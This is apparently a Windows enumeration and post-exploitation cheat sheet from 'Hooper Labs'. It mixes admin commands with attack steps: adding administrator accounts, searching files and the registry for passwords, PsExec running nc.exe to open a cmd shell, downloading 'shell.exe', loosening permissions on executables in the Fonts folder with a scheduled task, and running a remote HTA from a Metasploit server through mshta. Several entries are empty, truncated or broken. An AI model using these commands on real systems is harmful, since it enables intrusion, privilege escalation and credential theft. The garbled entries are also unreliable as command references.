Hooper Labs

Windows Enumeration


List System Info




OS Version



Prints username

	echo %username% 

Display All User Info

	whoami /all 

Env Variables Beginning with "U"

	SET U All

Add User

	net user <user> <password> /add

Add User to Group

	net localgroup administrators /add <user>

Add User to Domain Group

	net group "HR Admins" myUser /add /domain


Network Interfaces

	ipconfig /all  

Routing Table


ARP Table

	arp -A 

All Open Connections

	netstat -ano

Firewall State

	netsh firewall show state firewall state 

Firewall Config

	netsh firewall show config firewall config 

List Computers In Current Domain

	net view

List Users

	net users 

List User Info

	net user user1 


	net config

Processes, Services, Drivers

Scheduled Tasks

	schtasks /query /fo LIST /v 

Delete Scheduled Task


Create Scheduled Task

	SCHTASKS /create /tn SERVERQR /sc DAILY /mo 365 /tr "cmd /c echo,Y|cacls C:\Windows\Fonts\*.exe /G everyone:f"

Processes + Services

	tasklist /SVC

Terminate Process

	taskkill /PID pid

Kill Process forcefully by imagename

	taskkill /F /IM wscript.exe

Running Services

	net start

Query Service Config

	sc qc [service_name]

Service Info

	sc queryex state= 

List Drivers


Searching Files

PDF Search

	dir /a /s /b c:\'.pdf' 

Search for Patches

	dir /a /b c:\windows\kb' 

Search for Passwords

	findstr /si password *.txt *.xml *.xls *.ini *.infrecursively from current directory 

Search for filenames with password

	dir /s *pass* == *cred* == *vnc* == *.config*

Search registry for password

	reg query HKLM /f password /t REG_SZ /s | reg query HKCU /f password /t REG_SZ /s | reg query HKLM /v password /t REG_SZ /s 

View Remote Files

	dir \\IP.ADD.RE.SS\C$


Enum Domain Info


Run As Different User

	runas /u:Administrator cmd.exe

Copy output to Clipboard

	| clip

Check File Permissions

	cacls <Program File>

Check File Permissions


List Dirs and Owners

	dir /q 

Open Webpage


Installed Updates (Hotfixes)

	wmic qfe get Caption,Description,HotFixID,InstalledOn

Kill Processes with Known ExecutablePath

	wmic process where ExecutablePath='C:\\Windows\Fonts\\svhost.exe' delete


Download Page

	powershell -command "& {&'wget' -OutFile shell.exe}"  

Runas Equivalent

	PsExec.exe /accepteula  -u <user> -p <pass> nc.exe -nv 8888 -e cmd.exe 

Get System Privileges

	PsExec.exe /accepteula -i -d -s nc.exe -nv 8889 -e cmd.exe

Wget Equivalent

	Invoke-WebRequest -uri <URL> -OutFile C:\Windows\TEMP\outfile.txt

System Internal Suite Notes

Accept EULA

	accesschk.exe /accepteula 

Check Auto Runs

	Autorunsc.exe /accepteula

Check File Privs

	C:\Users\Public\accesschk64.exe /accepteula * 

Check Process Privs

	accesschk.exe -vqp *

Find Permissions

	accesschk.exe -uwdqs users c:\ 

Find Permissions

	accesschk.exe -uwdqs "Authenticated Users" c:\ 

Find Permissions

	accesschk.exe -uwqs users c:\*.* 

Find Permissions

	accesschk.exe -uwqs "Authenticated Users" c:\*.* 

Find Permissions

	cacls "c:\Program Files" /T | findstr Users

Stop network traffic to domain

	echo my.crypto-pool.info >> %WINDIR%\system32\drivers\etc\hosts

Take Ownership of a File

	takeown /F file.txt

MSHTA.exe Code Execution

	Start metasploit server (exploit/windows/misc/hta_server).  Then, run "mshta.exe //<ip-addr>/random.hta" on the host machine.

Temporary Folder (System)


Temporary Folder (User)



List Groups

	wmic group list brief

List Hotfixes

	wmic qfe list brief

Desktop Information

	wmic desktop list brief

CD Information

	wmic cdrom list brief

NIC Information

	wmic nic list brief

Control Output of wmic Command

	wmic process get name,processid

Close a Program

	wmic process where processid="1000" call terminate

Close a Remote Program

	wmic /node:localhost /user:rambo /password:FirstBl00dPart3 process where name="paint.exe" call terminate

Turn on RemoteDesktop

	-wmic /node:"servername" /user:"user@domain" /password: "password" RDToggle where ServerName="server name" call SetAllowTSConnections 1

LogicalDisk Free Space

	wmic /Node:%%A LogicalDisk Where DriveType="3" Get DeviceID,FileSystem,FreeSpace,Size /Format:csv MORE /E +2 >> SRVSPACE.CSV

List all Shares

	wmic logicaldisk get name,providername

List Startup Processes

	wmic startup get caption,command,user

Run wmic Remotely

	wmic /node:remotehost /username:rambo /password:FirstBl00dPart3 service where name="LanManServer" get caption,name,status,started


Make HTTP Request (Download a file)

	certutil.exe -urlcache -split -f http://7-zip.org/a/7z1604-x64.exe 7zip.exe

Open remote Office document

	"C:\Program Files\Microsoft Office\Root\Office16\protocolhandler.exe" "ms-word:nft|u|https://url/doc.dotm"

List Shadow Copies

List all autorun programs in XML format

	autorunsc.exe -x > autoruns.xml

List all non-microsoft autoruns in CSV format

	autorunsc.exe -m -v 

List audit policy

	auditpol /get /category:*

Turn on an audit policy

	auditpol /set /subcategory:"Logon" /success:enable